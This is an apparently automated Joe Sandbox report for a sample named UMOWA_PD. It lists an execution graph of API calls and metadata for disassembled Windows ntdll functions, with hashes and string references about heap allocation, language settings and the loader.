                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                    • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                    • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8

                                                                                    Execution Graph

                                                                                    Execution Coverage:0%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:23.5%
                                                                                    Total number of Nodes:81
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 51244 33c8e3c0 435 API calls 51245 33c881c0 209 API calls 51246 33c8bfc0 11 API calls 51310 33c8b0c0 405 API calls 51247 33c91dc0 17 API calls 51248 33d11dd8 619 API calls 51249 33ca51c0 403 API calls 51312 33cc32c0 359 API calls 51251 33c8c1d0 357 API calls 51252 33c89fd0 354 API calls 51253 33c93bd0 15 API calls 51315 33cbf4d0 366 API calls 51316 33c872e0 353 API calls 51317 33c922e1 8 API calls 51318 33c958e0 838 API calls 51256 33cbe9e0 374 API calls 51319 33cb66e0 451 API calls 51321 33cc54e0 209 API calls 51257 33c873f0 6 API calls 51322 33cbacf0 363 API calls 51323 33cbccf0 GetPEB GetPEB 51326 33ccb28a LdrInitializeThunk 51328 33cbbe80 354 API calls 51329 33d0d69d 353 API calls 51262 33d13f9f 8 API calls 51330 33c8a290 559 API calls 51331 33c8c090 378 API calls 51332 33c8fe90 13 API calls 51333 33c9c690 GetPEB 51334 33cad690 9 API calls 51241 33cd2b90 LdrInitializeThunk 51265 33c88196 8 API calls 51266 33c8e9ac 644 API calls 51268 33c87da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 51335 33c8bea0 365 API calls 51336 33c900a0 612 API calls 51337 33c906a0 382 API calls 51270 33d58bbe 50 API calls 51271 33cc43a0 381 API calls 51273 33c945b0 642 API calls 51274 33c8c140 362 API calls 51275 33c8a740 440 API calls 51342 33c93640 367 API calls 51276 33d1395b 355 API calls 51343 33cbea40 383 API calls 51280 33cae547 614 API calls 51281 33cc415f 356 API calls 51344 33c86c5d 355 API calls 51284 33c9b950 565 API calls 51345 33cac850 604 API calls 51347 33c8b260 374 API calls 51348 33c87060 RtlDebugPrintTimes 51349 33c87860 210 API calls 51351 33c93c60 17 API calls 51286 33c8c170 644 API calls 51288 33c91f70 379 API calls 51289 33cbaf72 382 API calls 51352 33c8ec0b 644 API calls 51353 33c8640d 608 API calls 51355 33c86e00 RtlDebugPrintTimes RtlDebugPrintTimes 51356 33cbd600 732 API calls 51291 33cc0100 355 API calls 51292 33d1c51d 8 API calls 51293 33cc5900 358 API calls 51357 33c8821b 383 API calls 51359 33c89610 605 API calls 51297 33c98b10 380 API calls 51361 33c92410 654 API calls 51362 33d23608 569 API calls 51298 33cbc310 359 API calls 51300 33cbcb10 GetPEB GetPEB GetPEB GetPEB 51303 33c8bf20 378 API calls 51364 33c8b620 211 API calls 51365 33c8b420 362 API calls 51304 33cc1527 359 API calls 51366 33c92022 221 API calls 51368 33c87a30 374 API calls 51369 33c8b830 601 API calls 51309 33cad530 354 API calls 51372 33c92e32 378 API calls 51373 33cc0030 353 API calls

                                                                                    Executed Functions

                                                                                    Function 33CD34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2 33cd34e0-33cd34ec LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 02c1f4ea21208b5dfd86b4f1f689c6fd7ab50526a540bdcb7a13fe4ce207af6f
                                                                                    • Instruction ID: ad0691754a536ff6b7ffb396220e3c63023956a54bee2c8f160dcd4d2f905e2b
                                                                                    • Opcode Fuzzy Hash: 02c1f4ea21208b5dfd86b4f1f689c6fd7ab50526a540bdcb7a13fe4ce207af6f
                                                                                    • Instruction Fuzzy Hash: 4590023260520802D51162584614706200557D0607F61C816A441852CDC7A5895575E2
                                                                                    Function 33CD2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 33cd2b90-33cd2b9c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8ec35cf65be627daf8825f7bdce1b79a6bdb0172e2bece5745e7e22c65a0c599
                                                                                    • Instruction ID: 7e2e01953b79bd874c40eeb67ab000a6e28f3c7b6b187261f51fd92bfb6469fd
                                                                                    • Opcode Fuzzy Hash: 8ec35cf65be627daf8825f7bdce1b79a6bdb0172e2bece5745e7e22c65a0c599
                                                                                    • Instruction Fuzzy Hash: 4B90023220118C02D5216258850474A100557D0707F55C816A841861CDC6A588957161
                                                                                    Function 33CD2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1 33cd2d10-33cd2d1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7733678c001d0c7abd821d1501ebd69f3c7424a581386b5991f4c0a3fe109a1d
                                                                                    • Instruction ID: 4647d7d9590852f7fd3160f3583c34e98c648a9028c85524d94dabcf9385396c
                                                                                    • Opcode Fuzzy Hash: 7733678c001d0c7abd821d1501ebd69f3c7424a581386b5991f4c0a3fe109a1d
                                                                                    • Instruction Fuzzy Hash: 9790023220110813D52262584604707100957D0647F91C817A441851CDD6668956B161

                                                                                    Non-executed Functions

                                                                                    Function 33D3FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 250 33d3fdf4-33d3fe16 call 33ce7be4 253 33d3fe35-33d3fe4d call 33c87662 250->253 254 33d3fe18-33d3fe30 RtlDebugPrintTimes 250->254 258 33d3fe53-33d3fe69 253->258 259 33d40277 253->259 260 33d402d1-33d402e0 254->260 261 33d3fe70-33d3fe72 258->261 262 33d3fe6b-33d3fe6e 258->262 263 33d4027a-33d402ce call 33d402e6 259->263 264 33d3fe73-33d3fe8a 261->264 262->264 263->260 266 33d3fe90-33d3fe93 264->266 267 33d40231-33d4023a GetPEB 264->267 266->267 271 33d3fe99-33d3fea2 266->271 269 33d4023c-33d40257 GetPEB call 33c8b910 267->269 270 33d40259-33d4025e call 33c8b910 267->270 278 33d40263-33d40274 call 33c8b910 269->278 270->278 275 33d3fea4-33d3febb call 33c9fed0 271->275 276 33d3febe-33d3fed1 call 33d40835 271->276 275->276 285 33d3fed3-33d3feda 276->285 286 33d3fedc-33d3fef0 call 33c8753f 276->286 278->259 285->286 289 33d3fef6-33d3ff02 GetPEB 286->289 290 33d40122-33d40127 286->290 291 33d3ff70-33d3ff7b 289->291 292 33d3ff04-33d3ff07 289->292 290->263 293 33d4012d-33d40139 GetPEB 290->293 298 33d3ff81-33d3ff88 291->298 299 33d40068-33d4007a call 33ca2710 291->299 294 33d3ff26-33d3ff2b call 33c8b910 292->294 295 33d3ff09-33d3ff24 GetPEB call 33c8b910 292->295 296 33d401a7-33d401b2 293->296 297 33d4013b-33d4013e 293->297 312 33d3ff30-33d3ff51 call 33c8b910 GetPEB 294->312 295->312 296->263 300 33d401b8-33d401c3 296->300 302 33d40140-33d4015b GetPEB call 33c8b910 297->302 303 33d4015d-33d40162 call 33c8b910 297->303 298->299 306 33d3ff8e-33d3ff97 298->306 322 33d40110-33d4011d call 33d40d24 call 33d40835 299->322 323 33d40080-33d40087 299->323 300->263 309 33d401c9-33d401d4 300->309 321 33d40167-33d4017b call 33c8b910 302->321 303->321 307 33d3ff99-33d3ffa9 306->307 308 33d3ffb8-33d3ffbc 306->308 307->308 315 33d3ffab-33d3ffb5 call 33d4d646 307->315 317 33d3ffce-33d3ffd4 308->317 318 33d3ffbe-33d3ffcc call 33cc3ae9 308->318 309->263 316 33d401da-33d401e3 GetPEB 309->316 312->299 343 33d3ff57-33d3ff6b 312->343 315->308 326 33d401e5-33d40200 GetPEB call 33c8b910 316->326 327 33d40202-33d40207 call 33c8b910 316->327 329 33d3ffd7-33d3ffe0 317->329 318->329 353 33d4017e-33d40188 GetPEB 321->353 322->290 332 33d40092-33d4009a 323->332 333 33d40089-33d40090 323->333 350 33d4020c-33d4022c call 33d3823a call 33c8b910 326->350 327->350 341 33d3fff2-33d3fff5 329->341 342 33d3ffe2-33d3fff0 329->342 334 33d4009c-33d400ac 332->334 335 33d400b8-33d400bc 332->335 333->332 334->335 345 33d400ae-33d400b3 call 33d4d646 334->345 347 33d400ec-33d400f2 335->347 348 33d400be-33d400d1 call 33cc3ae9 335->348 351 33d40065 341->351 352 33d3fff7-33d3fffe 341->352 342->341 343->299 345->335 359 33d400f5-33d400fc 347->359 364 33d400e3 348->364 365 33d400d3-33d400e1 call 33cbfdb9 348->365 350->353 351->299 352->351 358 33d40000-33d4000b 352->358 353->263 354 33d4018e-33d401a2 353->354 354->263 358->351 362 33d4000d-33d40016 GetPEB 358->362 359->322 363 33d400fe-33d4010e 359->363 367 33d40035-33d4003a call 33c8b910 362->367 368 33d40018-33d40033 GetPEB call 33c8b910 362->368 363->322 372 33d400e6-33d400ea 364->372 365->372 375 33d4003f-33d4005d call 33d3823a call 33c8b910 367->375 368->375 372->359 375->351
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 3446177414-1700792311
                                                                                    • Opcode ID: 909ee4414b82d876b8cb26cd0ce56ab848060b4f652f2fa9c69bdb6f4c5a75e0
                                                                                    • Instruction ID: 4ade744dd38929b5a2b0ef2b88d66b8e61efb1b786817eafa9c362c711aca252
                                                                                    • Opcode Fuzzy Hash: 909ee4414b82d876b8cb26cd0ce56ab848060b4f652f2fa9c69bdb6f4c5a75e0
                                                                                    • Instruction Fuzzy Hash: 06D11339901745EFDB01DFA4D440AA9FBF1FF0AB14F098089E495AF652CB39EA46CB50
                                                                                    Function 33D3F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1261 33d3f0a5-33d3f0c7 call 33ce7be4 1264 33d3f0e3-33d3f0fb call 33c87662 1261->1264 1265 33d3f0c9-33d3f0de RtlDebugPrintTimes 1261->1265 1270 33d3f3d2 1264->1270 1271 33d3f101-33d3f11c 1264->1271 1269 33d3f3e7-33d3f3f6 1265->1269 1272 33d3f3d5-33d3f3e4 call 33d3f3f9 1270->1272 1273 33d3f125-33d3f137 1271->1273 1274 33d3f11e 1271->1274 1272->1269 1276 33d3f139-33d3f13b 1273->1276 1277 33d3f13c-33d3f144 1273->1277 1274->1273 1276->1277 1279 33d3f350-33d3f359 GetPEB 1277->1279 1280 33d3f14a-33d3f14d 1277->1280 1281 33d3f35b-33d3f376 GetPEB call 33c8b910 1279->1281 1282 33d3f378-33d3f37d call 33c8b910 1279->1282 1280->1279 1283 33d3f153-33d3f156 1280->1283 1291 33d3f382-33d3f396 call 33c8b910 1281->1291 1282->1291 1286 33d3f173-33d3f196 call 33d40835 call 33ca5d90 call 33d40d24 1283->1286 1287 33d3f158-33d3f170 call 33c9fed0 1283->1287 1286->1272 1300 33d3f19c-33d3f1a3 1286->1300 1287->1286 1291->1270 1301 33d3f1a5-33d3f1ac 1300->1301 1302 33d3f1ae-33d3f1b6 1300->1302 1301->1302 1303 33d3f1d4-33d3f1d8 1302->1303 1304 33d3f1b8-33d3f1c8 1302->1304 1305 33d3f1da-33d3f1ed call 33cc3ae9 1303->1305 1306 33d3f208-33d3f20e 1303->1306 1304->1303 1307 33d3f1ca-33d3f1cf call 33d4d646 1304->1307 1314 33d3f1ff 1305->1314 1315 33d3f1ef-33d3f1fd call 33cbfdb9 1305->1315 1309 33d3f211-33d3f21b 1306->1309 1307->1303 1312 33d3f22f-33d3f236 1309->1312 1313 33d3f21d-33d3f22d 1309->1313 1316 33d3f241-33d3f250 GetPEB 1312->1316 1317 33d3f238-33d3f23c call 33d40835 1312->1317 1313->1312 1319 33d3f202-33d3f206 1314->1319 1315->1319 1321 33d3f252-33d3f255 1316->1321 1322 33d3f2be-33d3f2c9 1316->1322 1317->1316 1319->1309 1323 33d3f257-33d3f272 GetPEB call 33c8b910 1321->1323 1324 33d3f274-33d3f279 call 33c8b910 1321->1324 1322->1272 1326 33d3f2cf-33d3f2d5 1322->1326 1331 33d3f27e-33d3f292 call 33c8b910 1323->1331 1324->1331 1326->1272 1329 33d3f2db-33d3f2e2 1326->1329 1329->1272 1332 33d3f2e8-33d3f2f3 1329->1332 1340 33d3f295-33d3f29f GetPEB 1331->1340 1332->1272 1334 33d3f2f9-33d3f302 GetPEB 1332->1334 1336 33d3f321-33d3f326 call 33c8b910 1334->1336 1337 33d3f304-33d3f31f GetPEB call 33c8b910 1334->1337 1342 33d3f32b-33d3f34b call 33d3823a call 33c8b910 1336->1342 1337->1342 1340->1272 1343 33d3f2a5-33d3f2b9 1340->1343 1342->1340 1343->1272
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                    • API String ID: 3446177414-1745908468
                                                                                    • Opcode ID: 3cdb56c0b604a4162af41977c98cca2232759ad131d92d6fa4de060e13065af8
                                                                                    • Instruction ID: b17b02c4e863028b51c9a8c57ed2a60b3282526555e27f63e6a5cb4e1fb93e61
                                                                                    • Opcode Fuzzy Hash: 3cdb56c0b604a4162af41977c98cca2232759ad131d92d6fa4de060e13065af8
                                                                                    • Instruction Fuzzy Hash: A591113A906748DFDB01DFA8C440A9DBBF5FF4A724F188149E485AF652CB36AE41CB10
                                                                                    Function 33C8D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                    • API String ID: 0-3532704233
                                                                                    • Opcode ID: f07700c5926f249560e7f46168776ea611e721cd93fb5dfa582ce19fa7dbea52
                                                                                    • Instruction ID: 2f1b8f9aa3e623f5cb3975fa07f1e81d6223298fa24dbeb4f9e6602065788906
                                                                                    • Opcode Fuzzy Hash: f07700c5926f249560e7f46168776ea611e721cd93fb5dfa582ce19fa7dbea52
                                                                                    • Instruction Fuzzy Hash: 44B1DDB69093559FD711DF24D494B5FBBE8AF88748F05492EF888DB200DB70DA48CB92
                                                                                    Function 33CBD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlDebugPrintTimes.NTDLL ref: 33CBD879
                                                                                      • Part of subcall function 33C94779: RtlDebugPrintTimes.NTDLL ref: 33C94817
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-1975516107
                                                                                    • Opcode ID: db7f4d76868036b287dca595004cd00207525594293e3f9ef7427540f2e1276e
                                                                                    • Instruction ID: 1370a83fb7657f8c5f45cca30f8b6173bae26257c663e604184ec78cc9fcae20
                                                                                    • Opcode Fuzzy Hash: db7f4d76868036b287dca595004cd00207525594293e3f9ef7427540f2e1276e
                                                                                    • Instruction Fuzzy Hash: 5551BA76A0434A9FEB04DFA4C4A878DBBF2BF44318F644159D804FF691D776A986CB80
                                                                                    Function 33C8D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 33C8D136
                                                                                    • @, xrefs: 33C8D2B3
                                                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 33C8D06F
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 33C8D263
                                                                                    • @, xrefs: 33C8D24F
                                                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 33C8D0E6
                                                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 33C8D202
                                                                                    • @, xrefs: 33C8D09D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                    • API String ID: 0-1356375266
                                                                                    • Opcode ID: faa55b94601e097d5615da5930e01147d9db2843784f7fc3c2dbf9d8f7aa9e8d
                                                                                    • Instruction ID: ab4182a4f29c5f006e395e0c560904321d60f941bfac9dd8652b537a4f68a06f
                                                                                    • Opcode Fuzzy Hash: faa55b94601e097d5615da5930e01147d9db2843784f7fc3c2dbf9d8f7aa9e8d
                                                                                    • Instruction Fuzzy Hash: 85A180B28087059FE321CF10C494B5BB7E8BF84769F01492EF598DA240D774DA48CF92
                                                                                    Function 33D18633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 33D1880F
                                                                                    • VerifierDebug, xrefs: 33D18925
                                                                                    • HandleTraces, xrefs: 33D1890F
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 33D186BD
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 33D186E7
                                                                                    • VerifierFlags, xrefs: 33D188D0
                                                                                    • VerifierDlls, xrefs: 33D1893D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    • Opcode ID: 8ba02bd0b48f2e25c768ed8244f7b01e2f422a000c10d9e6abf5f16b0fb0722c
                                                                                    • Instruction ID: 08b14c890fc9fb9c735eb36f298aaa42688cfbc6d3b1b41c9e4329c5994336df
                                                                                    • Opcode Fuzzy Hash: 8ba02bd0b48f2e25c768ed8244f7b01e2f422a000c10d9e6abf5f16b0fb0722c
                                                                                    • Instruction Fuzzy Hash: 639177B2E017519FE391EF64E880B0AB7E9EF40B14F490858F981AF250CB74ED25CB91
                                                                                    Function 33CB237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 33CFA79F
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33CFA7AF
                                                                                    • apphelp.dll, xrefs: 33CB2382
                                                                                    • LdrpDynamicShimModule, xrefs: 33CFA7A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    • Opcode ID: f8edb0f1eec1245d1bedc087bd90ba942c59f3cdd1c1c5ac2d7d3781977b39ec
                                                                                    • Instruction ID: 6d2900d23229461079bd287b09cd3b2ee4545279e5d037d8d601223756e242a0
                                                                                    • Opcode Fuzzy Hash: f8edb0f1eec1245d1bedc087bd90ba942c59f3cdd1c1c5ac2d7d3781977b39ec
                                                                                    • Instruction Fuzzy Hash: DE31057BA10200EFE750AF59C880E5AB7F9EF80B54F190059E905FF650DBB1A942CF90
                                                                                    Function 33C8F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-523794902
                                                                                    • Opcode ID: 18b1ce88401c8897529803032613814c2994d59b0b2fc0e8c690545aa5e74d8e
                                                                                    • Instruction ID: 6d1d81afce5e5b8c7463cc16aa5c5b4fd735b625f40bfc6b21586c7851716281
                                                                                    • Opcode Fuzzy Hash: 18b1ce88401c8897529803032613814c2994d59b0b2fc0e8c690545aa5e74d8e
                                                                                    • Instruction Fuzzy Hash: 8842F0756087819FD301CF28D894B2ABBE5FF84348F084A69F895CF651DB34EA45CB62
                                                                                    Function 33CAB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
